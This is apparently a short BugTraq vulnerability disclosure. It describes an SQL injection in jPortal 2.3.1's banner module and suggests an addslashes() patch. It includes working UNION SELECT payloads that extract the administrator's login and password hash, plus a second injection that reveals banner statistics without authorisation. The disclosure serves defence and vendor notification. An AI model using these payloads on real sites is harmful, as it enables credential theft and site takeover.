Hello BugTraq, I've found possibility to inject sql code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php). Bug is in these lines of code: $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; (line 192) There is unfiltered variable $haslo. In order to patch this code just add this: $haslo = addslashes($haslo); before above line. PoC: go to http://[victim]/jportal/banner.php and try this: ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 and then: ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1 After that, You gain login and md5 hash password of administrator. PoC 2: try to inject this code: ' or id='x x - banner id After that, You can see statistics of not banners, to which you haven't got passwords. Vendor (http://jportal2.com) has been informed already. -- Best regards, Marcin "CiNU5" Krupowicz
